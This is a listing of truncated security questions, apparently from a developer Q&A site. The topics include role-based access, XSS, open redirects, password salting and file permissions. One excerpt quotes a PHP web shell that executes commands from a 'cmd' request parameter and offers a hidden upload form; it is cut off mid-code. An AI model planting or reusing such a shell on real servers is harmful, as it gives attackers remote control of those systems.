In ASP.NET what's the best way to do the following: Show certain controls based on your rights? For a gridview control, how do you show certain columns based on your role? I'm thinking for number 2, have the data come from a role specific view on the database. ...
I've got a website that has windows authentication enable on it. From a page in the website, the users have the ability to start a service that does some stuff with the database. It works fine for me to start the service because I'm a local admin on the server. But I just had a user test it and they can't get the service started. My qu...
A very well known major drawback of using CGI is poor webserver performance. But how secure are CGI (mainly C/C++) based applications? Are there any major security holes in CGI architecture built on C/C++? I would like to know some real life implementations of CGI based web apps/web sites. One that I know of is javaranch.com. ...
I am currently enrolled in an information security class and have, thus far, been unimpressed by our assigned textbook. After doing a quick check at Amazon for other security texts, a common complaint amongst reviewers was that their books offer a cursory, entirely theoretical look at hacking and defense with no real world examples. I'...
I have a webpage that redirects to another webpage like this: http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come ...
I have a database for a web application that is home to some personal information about my users. What should I do to make sure the data is secure? Encrypting the data makes sense, of course... but what about stopping somebody from getting on the machine to begin with? What do I do about the developers that need access to the data, to...
In a normal web app w/ login and secure data, what is an easy way to secure that data and prevent it from being seen by using the browser's back button, once a user logs out? ...
I've recently gotten my hobby java project embedded into a page thanks to this very site, but now I'm having some security issues. I have the include: import java.sql.*; and the line: Class.forName("com.mysql.jdbc.Driver").newInstance(); as well as a mysql .jar file in my src directory, it works from the console, and in the applet...
So I was wondering if there are any major differences between the various implementations of the hash algorithms, take the SHA series of algorithms for example. All of them have 3 implementations each, 1 in managed code and 2 wrappers around different native crypto APIs, but are there any major differences between using any of them? I ca...
I am trying to construct a way to keep certain hard drive partitions/usb drives from being accessed for security reasons (protecting intellectual property). I was thinking that when windows attempts to access the "locked down drive/usb" the attempted is halted and returns something like "drive inaccessible" or something. It's just an ide...
Hello, I have been tasked to implement a WCF service that makes use of NetMsmqBinding. I wrote the service and it works fine. The problem is that in the last minute they told me that there will be no Active Directory integration. So I don't know how to configure the security of the service. There is a VPN tunnel between the service's an...
The requirements for my document management system were: Must be secure from theft by simple copying of directories, files etc. Must be secure against traditional virus infection (infection of physical file) Must be fast to retrieve The repository must not be visible to casual (directory) browsing users etc. I have decided to store a...
This is an extension of my earlier XSS question. Assuming that there isn't a Regex strong enough to guarantee XSS saftey for user entered URLs I'm looking at using a redirect. (Although if you do have one please add it under the other question) We have user input web addresses, so: stackoverflow.com They want a link to appear fo...
At about 24:20 in Stack Overflow Podcast 26 Joel Spolsky said there are services that mail postcards with codes for address verification. Spolsky: You know what we could have badges for? We could have badges for like: "Real Address". Like I have proven that you live at a certain address. Atwood: We could. Spolsky:...
I'm working on a web app project (in java; not that it matters) and we have a form with drop down lists and input fields,etc.. Obviously drop down lists are provided because we expect a specific value from a set of values. So my question is this..does it make sense to ensure the submitted value is in the set of expected values? ...
At work we have two competing theories for salts. The products I work on use something like a user name or phone number to salt the hash. Essentially something that is different for each user but is readily available to us. The other product randomly generates a salt for each user and changes each time the user changes the password. ...
A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script: <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> <?php if(isset($_REQUEST['upload'])){ echo ' <form enctype="multipart/form-data" action=".config.php?send" method="PO...
What is the best solution to sanitize output html in rails (to avoid XSS attacks)? I have two options: white_list plugin or sanitize method from Sanitize Helper http://api.rubyonrails.com/classes/ActionView/Helpers/SanitizeHelper.html? For me until today the white_list plugin worked better and in the past, Santize was very buggy, but as...
Hi there, Is the asp.net membership system used over wcf (transport security turned on) enough for high security internet scenarios with thousands of clients spread all over the internet? I'm just evaluating possible solutions and wanted to know if this might fit in this category. If not, what would be the best method to provide high ...
I am trying to create a file in the /tmp directory (working on a Linux UBUNTU 7.10), that has read/write/execute access for any user. So I am using the "open(fileName,O_CREAT|O_RDWR,0777)" function to create the file (from a C program) in user1 account and I would like user2 to be able to write to the specific file. However, when i chec...